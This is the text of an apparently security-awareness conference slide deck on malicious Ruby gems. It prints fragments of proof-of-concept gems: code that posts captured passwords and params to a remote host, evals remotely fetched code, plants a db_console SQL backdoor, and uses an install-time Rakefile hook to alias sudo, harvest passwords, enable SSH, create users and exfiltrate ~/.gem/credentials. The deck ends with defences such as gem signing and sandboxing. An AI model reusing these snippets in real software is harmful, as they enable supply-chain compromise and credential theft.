Hacking with Gems (Ruby Conf Australia)

Hacking with Gems Benjamin Smith @benjamin_smith Friday, February 22, 13

How-to get rich quick and (maybe) not go to jail!
Friday, February 22, 13

who i am Friday, February 22, 13

what i am NOT Friday, February 22, 13

please do not try this at home Friday, February 22,
13

how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12)
actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ... Friday, February 22, 13

what’s the worst that could happen? Friday, February 22, 13

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

before... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

after! github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22,
13

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages
@benjamin_smith Friday, February 22, 13

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22,
13

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22,
13

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February
22, 13

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

proﬁt • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: proﬁt Friday, February 22, 13

proﬁt • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4: Friday, February 22, 13

• Step 2: add code to harvest emails/pws • Step 3: • Step 4: Friday, February 22, 13

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Friday, February 22, 13

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: proﬁt Friday, February 22, 13

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: proﬁt • Step 5: ﬂee the country Friday, February 22, 13

a one way ticket to Friday, February 22, 13

that was easy. what else can I do? Friday, February
22, 13

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

/users/sign_in github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

hello db access! github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February
22, 13

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February
22, 13

careful of wolves in sheep’s clothing Friday, February 22, 13

Little Snitch obdev.at/products/littlesnitch/index.html @benjamin_smith Friday, February 22, 13

proﬁt • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5: Friday, February 22, 13

• Step 2: • Step 3: • Step 4: • Step 5: Friday, February 22, 13

• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Friday, February 22, 13

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Friday, February 22, 13

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: proﬁt • Step 5: Friday, February 22, 13

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: proﬁt • Step 5: ﬂee the country Friday, February 22, 13

i like the beach Friday, February 22, 13

that was easy. what else can I do? Friday, February
22, 13

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s @benjamin_smith

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

what what github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

i can haz source github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: proﬁt? • Step 5: ﬂee the country Friday, February 22, 13

that was easy hard. what else can I do? (that's
easier) Friday, February 22, 13

gem install be_truthy github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

what it ACTUALLY does github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

ﬁle tree looks ok github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

but what was this? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

I see no C github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

run the what ﬁle? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

there is no Rakeﬁle github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

the real ﬁle tree github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

what does the Rakeﬁle do? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22,
13

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy @benjamin_smith

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

fseventer fernlightning.com/doku.php?id=software:fseventer:start @benjamin_smith Friday, February 22, 13

what does "sudo" do now? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22,
13

print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy @benjamin_smith

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday,
February 22, 13

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

take away: don't install ben's gems Friday, February 22, 13

take away: use windows? Friday, February 22, 13

don't install ben's gems Friday, February 22, 13

how could I get you to install my gems? Friday,
February 22, 13

what gems are trustworthy? Friday, February 22, 13

how can I add my code to already trusted gems?

back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem @benjamin_smith Friday, February 22, 13

now I own your gems github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22,
13

> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

do people trust your gems? Friday, February 22, 13

do people who install your gems have trustworthy gems? Friday,
February 22, 13

there’s still one problem Friday, February 22, 13

bootstrapping Friday, February 22, 13

being popular sucks Friday, February 22, 13

conferences Friday, February 22, 13

values Friday, February 22, 13

hamster Friday, February 22, 13

wbench Friday, February 22, 13

almost-sinatra Friday, February 22, 13

almost-rack Friday, February 22, 13

almost-rack-protection Friday, February 22, 13

social engineering Friday, February 22, 13

5% adoption Friday, February 22, 13

so what happens now? Friday, February 22, 13

ruby gems goes down Friday, February 22, 13

heroku deploys go down Friday, February 22, 13

i go to the beach Friday, February 22, 13

so what now? Friday, February 22, 13

gem cert --build Friday, February 22, 13

gem install rails -P HighSecurity Friday, February 22, 13

bsmith$ gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:
While executing gem ... (Gem::Exception) Unsigned gem Friday, February 22, 13

sandboxing Friday, February 22, 13

github.com/rubygems/rubygems Friday, February 22, 13

tools to detect malicious code Friday, February 22, 13

private gem repos Friday, February 22, 13

do not try this at home Friday, February 22, 13

don't install gems you don't need to Friday, February 22,
13

pay attention to what your gems do Friday, February 22,
13

monitor your system Friday, February 22, 13

read the source Friday, February 22, 13

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

on install github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

the results github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

thank you! Friday, February 22, 13

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Friday, February 22, 13

Hacking with Gems (Ruby Conf Australia)

Hacking with Gems (Ruby Conf Australia)

More Decks by Benjamin Smith

Other Decks in Technology

Featured

Transcript